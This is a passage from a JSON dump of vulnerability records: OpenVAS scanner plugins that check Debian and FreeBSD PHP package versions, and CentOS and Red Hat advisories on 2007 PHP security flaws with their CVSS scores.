);\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:49:41", "bulletinFamily": "scanner", "description": "The remote host is missing an update to php4\nannounced via advisory DSA 1264-1.\n\nSeveral remote vulnerabilities have been discovered in PHP, a server-side,\nHTML-embedded scripting language, which may lead to the execution of\narbitrary code. The Common Vulnerabilities and Exposures project identifies\nthe following problems:\n\nCVE-2007-0906\n\nIt was discovered that an integer overflow in the str_replace()\nfunction could lead to the execution of arbitrary code.\n\nCVE-2007-0907\n\nIt was discovered that a buffer underflow in the sapi_header_op()\nfunction could crash the PHP interpreter.\n\nCVE-2007-0908\n\nStefan Esser discovered that a programming error in the wddx\nextension allows information disclosure.\n\nCVE-2007-0909\n\nIt was discovered that a format string vulnerability in the\nodbc_result_all() functions allows the execution of arbitrary code.\n\nCVE-2007-0910\n\nIt was discovered that super-global variables could be overwritten\nwith session data.\n\nCVE-2007-0988\n\nStefan Esser discovered that the zend_hash_init() function could\nbe tricked into an endless loop, allowing denial of service through\nresource consumption until a timeout is triggered.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=58119", "id": "OPENVAS:58119", "title": "Debian Security Advisory DSA 1264-1 (php4)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1264_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1264-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 4:4.3.10-19.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 6:4.4.4-9 of php4 and version 5.2.0-9 of php5.\n\nWe recommend that you upgrade your php4 packages.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201264-1\";\ntag_summary = \"The remote host is missing an update to php4\nannounced via advisory DSA 1264-1.\n\nSeveral remote vulnerabilities have been discovered in PHP, a server-side,\nHTML-embedded scripting language, which may lead to the execution of\narbitrary code. The Common Vulnerabilities and Exposures project identifies\nthe following problems:\n\nCVE-2007-0906\n\nIt was discovered that an integer overflow in the str_replace()\nfunction could lead to the execution of arbitrary code.\n\nCVE-2007-0907\n\nIt was discovered that a buffer underflow in the sapi_header_op()\nfunction could crash the PHP interpreter.\n\nCVE-2007-0908\n\nStefan Esser discovered that a programming error in the wddx\nextension allows information disclosure.\n\nCVE-2007-0909\n\nIt was discovered that a format string vulnerability in the\nodbc_result_all() functions allows the execution of arbitrary code.\n\nCVE-2007-0910\n\nIt was discovered that super-global variables could be overwritten\nwith session data.\n\nCVE-2007-0988\n\nStefan Esser discovered that the zend_hash_init() function could\nbe tricked into an endless loop, allowing denial of service through\nresource consumption until a timeout is triggered.\";\n\n\nif(description)\n{\n script_id(58119);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:17:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2006-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-0908\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1264-1 (php4)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"php4-pear\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache-mod-php4\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php4\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-cgi\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-cli\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-common\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-curl\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-dev\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-domxml\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-gd\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-imap\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-ldap\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mcal\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mhash\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mysql\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-odbc\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-recode\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-snmp\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-sybase\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-xslt\", ver:\"4.3.10-19\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:26", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-27T00:00:00", "published": "2008-09-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=58010", "id": "OPENVAS:58010", "title": "php -- multiple vulnerabilities", "type": "openvas", "sourceData": "#\n#VID 7fcf1727-be71-11db-b2ec-000c6ec775d9\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n\n php5-imap php5-odbc php5-session php5-shmop php5-sqlite php5-wddx\n php5 php4-odbc php4-session php4-shmop php4-wddx php4 mod_php4-twig\n mod_php4 mod_php5 mod_php php4-cgi php4-cli php4-dtc php4-horde\n php4-nms php5-cgi php5-cli php5-dtc php5-horde php5-nms\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/24089/\nhttp://www.php.net/releases/4_4_5.php\nhttp://www.php.net/releases/5_2_1.php\nhttp://www.vuxml.org/freebsd/7fcf1727-be71-11db-b2ec-000c6ec775d9.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(58010);\n script_version(\"$Revision: 4148 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-27 07:32:19 +0200 (Tue, 27 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2007-0905\", \"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"php -- multiple vulnerabilities\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"php5-imap\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.2.1_2\")<0) {\n txt += 'Package php5-imap version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-odbc\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.2.1_2\")<0) {\n txt += 'Package php5-odbc version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-session\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.2.1_2\")<0) {\n txt += 'Package php5-session version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-shmop\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.2.1_2\")<0) {\n txt += 'Package php5-shmop version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-sqlite\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.2.1_2\")<0) {\n txt += 'Package php5-sqlite version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-wddx\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.2.1_2\")<0) {\n txt += 'Package php5-wddx version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.2.1_2\")<0) {\n txt += 'Package php5 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-odbc\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.5\")<0) {\n txt += 'Package php4-odbc version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-session\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.5\")<0) {\n txt += 'Package php4-session version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-shmop\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.5\")<0) {\n txt += 'Package php4-shmop version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-wddx\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.5\")<0) {\n txt += 'Package php4-wddx version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.5\")<0) {\n txt += 'Package php4 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mod_php4-twig\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package mod_php4-twig version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mod_php4\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package mod_php4 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mod_php5\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package mod_php5 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mod_php\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package mod_php version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-cgi\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php4-cgi version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-cli\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php4-cli version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-dtc\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php4-dtc version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-horde\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php4-horde version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-nms\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php4-nms version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-cgi\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php5-cgi version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-cli\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php5-cli version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-dtc\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php5-dtc version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-horde\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php5-horde version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-nms\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php5-nms version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2019-05-29T18:33:52", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2007:0076\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA number of buffer overflow flaws were found in the PHP session extension,\r\nthe str_replace() function, and the imap_mail_compose() function.\r\nIf very long strings under the control of an attacker are passed to the\r\nstr_replace() function then an integer overflow could occur in memory\r\nallocation. If a script uses the imap_mail_compose() function to create a\r\nnew MIME message based on an input body from an untrusted source, it could\r\nresult in a heap overflow. An attacker who is able to access a PHP\r\napplication affected by any these issues could trigger these flaws and\r\npossibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\r\n\r\nIf unserializing untrusted data on 64-bit platforms, the zend_hash_init()\r\nfunction can be forced to enter an infinite loop, consuming CPU resources\r\nfor a limited length of time, until the script timeout alarm aborts\r\nexecution of the script. (CVE-2007-0988)\r\n\r\nIf the wddx extension is used to import WDDX data from an untrusted source,\r\ncertain WDDX input packets may allow a random portion of heap memory to be\r\nexposed. (CVE-2007-0908)\r\n\r\nIf the odbc_result_all() function is used to display data from a database,\r\nand the contents of the database table are under the control of an\r\nattacker, a format string vulnerability is possible which could lead to the\r\nexecution of arbitrary code. (CVE-2007-0909)\r\n\r\nA one byte memory read will always occur before the beginning of a buffer,\r\nwhich could be triggered for example by any use of the header() function in\r\na script. However it is unlikely that this would have any effect.\r\n(CVE-2007-0907)\r\n\r\nSeveral flaws in PHP could allows attackers to \"clobber\" certain\r\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.\r\n\r\nRed Hat would like to thank Stefan Esser for his help diagnosing these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-February/013543.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-February/013544.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-February/013545.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-February/013546.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-February/013547.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-February/013548.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-February/013558.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-February/013559.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-domxml\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pear\nphp-pgsql\nphp-snmp\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0076.html", "modified": "2007-02-21T17:35:15", "published": "2007-02-19T21:40:07", "href": "http://lists.centos.org/pipermail/centos-announce/2007-February/013543.html", "id": "CESA-2007:0076", "title": "php security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:43", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2007:0081-01\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA number of buffer overflow flaws were found in the PHP session extension;\r\nthe str_replace() function; and the imap_mail_compose() function. If very\r\nlong strings were passed to the str_replace() function, an integer\r\noverflow could occur in memory allocation. If a script used the\r\nimap_mail_compose() function to create a new MIME message based on an\r\ninput body from an untrusted source, it could result in a heap overflow.\r\nAn attacker with access to a PHP application affected by any these issues\r\ncould trigger the flaws and possibly execute arbitrary code as the\r\n'apache' user. (CVE-2007-0906)\r\n\r\nWhen unserializing untrusted data on 64-bit platforms, the\r\nzend_hash_init() function could be forced into an infinite loop, consuming\r\nCPU resources for a limited time, until the script timeout alarm aborted\r\nexecution of the script. (CVE-2007-0988)\r\n\r\nIf the wddx extension was used to import WDDX data from an untrusted\r\nsource, certain WDDX input packets could expose a random portion of heap\r\nmemory. (CVE-2007-0908)\r\n\r\nIf the odbc_result_all() function was used to display data from a database,\r\nand the database table contents were under an attacker's control, a format\r\nstring vulnerability was possible which could allow arbitrary code\r\nexecution. (CVE-2007-0909)\r\n\r\nA one byte memory read always occurs before the beginning of a buffer. This\r\ncould be triggered, for example, by any use of the header() function in a\r\nscript. However it is unlikely that this would have any effect.\r\n(CVE-2007-0907)\r\n\r\nSeveral flaws in PHP could allow attackers to \"clobber\" certain\r\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.\r\n\r\nRed Hat would like to thank Stefan Esser for his help diagnosing these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-February/013578.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-imap\nphp-ldap\nphp-manual\nphp-mysql\nphp-odbc\nphp-pgsql\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "modified": "2007-02-25T06:02:10", "published": "2007-02-25T06:02:10", "href": "http://lists.centos.org/pipermail/centos-announce/2007-February/013578.html", "id": "CESA-2007:0081-01", "title": "php security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:13", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2007:0154-01\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA denial of service flaw was found in the way PHP processed a deeply nested\r\narray. A remote attacker could cause the PHP interpreter to crash by\r\nsubmitting an input variable with a deeply nested array. (CVE-2007-1285)\r\n\r\nA flaw was found in the way PHP's unserialize() function processes data. If\r\na remote attacker is able to pass arbitrary data to PHP's unserialize()\r\nfunction, it may be possible for them to execute arbitrary code as the\r\napache user. (CVE-2007-1286)\r\n\r\nA double free flaw was found in PHP's session_decode() function. If a\r\nremote attacker is able to pass arbitrary data to PHP's session_decode()\r\nfunction, it may be possible for them to execute arbitrary code as the\r\napache user. (CVE-2007-1711)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013681.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-imap\nphp-ldap\nphp-manual\nphp-mysql\nphp-odbc\nphp-pgsql\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "modified": "2007-04-17T01:50:13", "published": "2007-04-17T01:50:13", "href": "http://lists.centos.org/pipermail/centos-announce/2007-April/013681.html", "id": "CESA-2007:0154-01", "title": "php security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:44:48", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA number of buffer overflow flaws were found in the PHP session extension,\r\nthe str_replace() function, and the imap_mail_compose() function.\r\nIf very long strings under the control of an attacker are passed to the\r\nstr_replace() function then an integer overflow could occur in memory\r\nallocation. If a script uses the imap_mail_compose() function to create a\r\nnew MIME message based on an input body from an untrusted source, it could\r\nresult in a heap overflow. An attacker who is able to access a PHP\r\napplication affected by any these issues could trigger these flaws and\r\npossibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\r\n\r\nIf unserializing untrusted data on 64-bit platforms, the zend_hash_init()\r\nfunction can be forced to enter an infinite loop, consuming CPU resources\r\nfor a limited length of time, until the script timeout alarm aborts\r\nexecution of the script. (CVE-2007-0988)\r\n\r\nIf the wddx extension is used to import WDDX data from an untrusted source,\r\ncertain WDDX input packets may allow a random portion of heap memory to be\r\nexposed. (CVE-2007-0908)\r\n\r\nIf the odbc_result_all() function is used to display data from a database,\r\nand the contents of the database table are under the control of an\r\nattacker, a format string vulnerability is possible which could lead to the\r\nexecution of arbitrary code. (CVE-2007-0909)\r\n\r\nA one byte memory read will always occur before the beginning of a buffer,\r\nwhich could be triggered for example by any use of the header() function in\r\na script. However it is unlikely that this would have any effect.\r\n(CVE-2007-0907)\r\n\r\nSeveral flaws in PHP could allows attackers to \"clobber\" certain\r\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.\r\n\r\nRed Hat would like to thank Stefan Esser for his help diagnosing these issues.", "modified": "2017-09-08T12:06:47", "published": "2007-02-19T05:00:00", "id": "RHSA-2007:0076", "href": "https://access.redhat.com/errata/RHSA-2007:0076", "type": "redhat", "title": "(RHSA-2007:0076) Important: php security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:33", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA number of buffer overflow flaws were found in the PHP session extension;\r\nthe str_replace() function; and the imap_mail_compose() function. If very\r\nlong strings were passed to the str_replace() function, an integer\r\noverflow could occur in memory allocation. If a script used the\r\nimap_mail_compose() function to create a new MIME message based on an\r\ninput body from an untrusted source, it could result in a heap overflow.\r\nAn attacker with access to a PHP application affected by any these issues\r\ncould trigger the flaws and possibly execute arbitrary code as the\r\n'apache' user. (CVE-2007-0906)\r\n\r\nWhen unserializing untrusted data on 64-bit platforms, the\r\nzend_hash_init() function could be forced into an infinite loop, consuming\r\nCPU resources for a limited time, until the script timeout alarm aborted\r\nexecution of the script. (CVE-2007-0988)\r\n\r\nIf the wddx extension was used to import WDDX data from an untrusted\r\nsource, certain WDDX input packets could expose a random portion of heap\r\nmemory. (CVE-2007-0908)\r\n\r\nIf the odbc_result_all() function was used to display data from a database,\r\nand the database table contents were under an attacker's control, a format\r\nstring vulnerability was possible which could allow arbitrary code\r\nexecution. (CVE-2007-0909)\r\n\r\nA one byte memory read always occurs before the beginning of a buffer. This\r\ncould be triggered, for example, by any use of the header() function in a\r\nscript. However it is unlikely that this would have any effect.\r\n(CVE-2007-0907)\r\n\r\nSeveral flaws in PHP could allow attackers to \"clobber\" certain\r\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.\r\n\r\nRed Hat would like to thank Stefan Esser for his help diagnosing these issues.", "modified": "2018-03-14T19:28:06", "published": "2007-02-21T05:00:00", "id": "RHSA-2007:0081", "href": "https://access.redhat.com/errata/RHSA-2007:0081", "type": "redhat", "title": "(RHSA-2007:0081) Important: php security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:13", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA number of buffer overflow flaws were found in the PHP session extension;\r\nthe str_replace() function; and the imap_mail_compose() function. If very\r\nlong strings were passed to the str_replace() function, an integer overflow\r\ncould occur in memory allocation. If a script used the imap_mail_compose()\r\nfunction to create a new MIME message based on an input body from an\r\nuntrusted source, it could result in a heap overflow. An attacker with\r\naccess to a PHP application affected by any these issues could trigger the\r\nflaws and possibly execute arbitrary code as the 'apache' user.\r\n(CVE-2007-0906)\r\n\r\nWhen unserializing untrusted data on 64-bit platforms, the zend_hash_init()\r\nfunction could be forced into an infinite loop, consuming CPU resources for\r\na limited time, until the script timeout alarm aborted execution of the\r\nscript. (CVE-2007-0988)\r\n\r\nIf the wddx extension was used to import WDDX data from an untrusted\r\nsource, certain WDDX input packets could expose a random portion of heap\r\nmemory. (CVE-2007-0908)\r\n\r\nIf the odbc_result_all() function was used to display data from a database,\r\nand the database table contents were under an attacker's control, a format\r\nstring vulnerability was possible which could allow arbitrary code\r\nexecution. (CVE-2007-0909)\r\n\r\nA one byte memory read always occurs before the beginning of a buffer. This\r\ncould be triggered, for example, by any use of the header() function in a\r\nscript. However it is unlikely that this would have any 